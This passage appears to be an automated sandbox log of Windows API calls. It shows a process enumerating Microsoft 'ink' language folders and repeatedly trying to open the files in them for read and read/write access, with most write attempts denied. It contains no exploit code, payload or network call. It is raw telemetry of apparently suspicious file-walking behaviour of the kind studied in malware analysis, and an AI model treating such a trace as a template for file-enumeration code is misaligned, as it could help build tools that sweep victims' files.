nFileSizeHigh=0x8e, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓฀")) returned 0 [0082.745] FindClose (in: hFindFile=0x78750 | out: hFindFile=0x78750) returned 1 [0082.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0082.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0082.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0082.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0082.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0082.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0082.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0082.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0082.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0082.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0082.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0082.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0082.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0082.746] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.746] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.746] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.746] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0082.746] AreFileApisANSI () returned 1 [0082.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES", lpUsedDefaultChar=0x0) returned 57 [0082.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0082.746] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.746] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0082.747] AreFileApisANSI () returned 1 [0082.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0082.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES") returned 57 [0082.747] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.747] GetLastError () returned 0x5 [0082.747] GetLastError () returned 0x5 [0082.747] SetLastError (dwErrCode=0x5) [0082.747] GetLastError () returned 0x5 [0082.747] SetLastError (dwErrCode=0x5) [0082.747] GetLastError () returned 0x5 [0082.747] SetLastError (dwErrCode=0x5) [0082.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0082.747] AreFileApisANSI () returned 1 [0082.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0082.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES") returned 57 [0082.747] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.747] GetLastError () returned 0x5 [0082.747] GetLastError () returned 0x5 [0082.747] SetLastError (dwErrCode=0x5) [0082.747] GetLastError () returned 0x5 [0082.747] SetLastError (dwErrCode=0x5) [0082.747] GetLastError () returned 0x5 [0082.748] SetLastError (dwErrCode=0x5) [0082.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0082.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0082.748] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.748] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.748] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.748] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0082.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f008 [0082.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0082.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0082.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0082.748] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dea14, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="es-MX", cAlternateFileName="")) returned 1 [0082.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0082.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0082.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0082.748] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x781d0 [0082.889] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05ddf5c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.889] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2ca937, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2ca937, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2ca937, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0082.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0082.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0082.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0082.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0082.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x465f8 [0082.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0082.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0082.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0082.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0082.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0082.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0082.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0082.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0082.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.890] AreFileApisANSI () returned 1 [0082.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0082.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0082.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0082.890] AreFileApisANSI () returned 1 [0082.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85ee0 [0082.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x85ee0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui") returned 73 [0082.890] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0082.891] GetFileType (hFile=0x42c) returned 0x1 [0082.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85ee0 | out: hHeap=0x20000) returned 1 [0082.891] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.891] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.891] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.891] CloseHandle (hObject=0x42c) returned 1 [0082.891] AreFileApisANSI () returned 1 [0082.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85ee0 [0082.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x85ee0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui") returned 73 [0082.892] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.892] GetLastError () returned 0x5 [0082.892] GetLastError () returned 0x5 [0082.892] SetLastError (dwErrCode=0x5) [0082.892] GetLastError () returned 0x5 [0082.892] SetLastError (dwErrCode=0x5) [0082.892] GetLastError () returned 0x5 [0082.892] SetLastError (dwErrCode=0x5) [0082.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85ee0 | out: hHeap=0x20000) returned 1 [0082.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0082.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.892] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x2e438, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⨀")) returned 0 [0082.892] FindClose (in: hFindFile=0x781d0 | out: hFindFile=0x781d0) returned 1 [0082.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0082.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0082.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0082.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0082.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0082.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0082.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0082.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0082.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0082.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0082.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0082.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0082.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0082.893] AreFileApisANSI () returned 1 [0082.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX", lpUsedDefaultChar=0x0) returned 57 [0082.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0082.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0082.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0082.893] AreFileApisANSI () returned 1 [0082.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a630 [0082.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6a630, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX") returned 57 [0082.894] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.894] GetLastError () returned 0x5 [0082.894] GetLastError () returned 0x5 [0082.894] SetLastError (dwErrCode=0x5) [0082.894] GetLastError () returned 0x5 [0082.894] SetLastError (dwErrCode=0x5) [0082.894] GetLastError () returned 0x5 [0082.894] SetLastError (dwErrCode=0x5) [0082.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0082.894] AreFileApisANSI () returned 1 [0082.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0082.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, 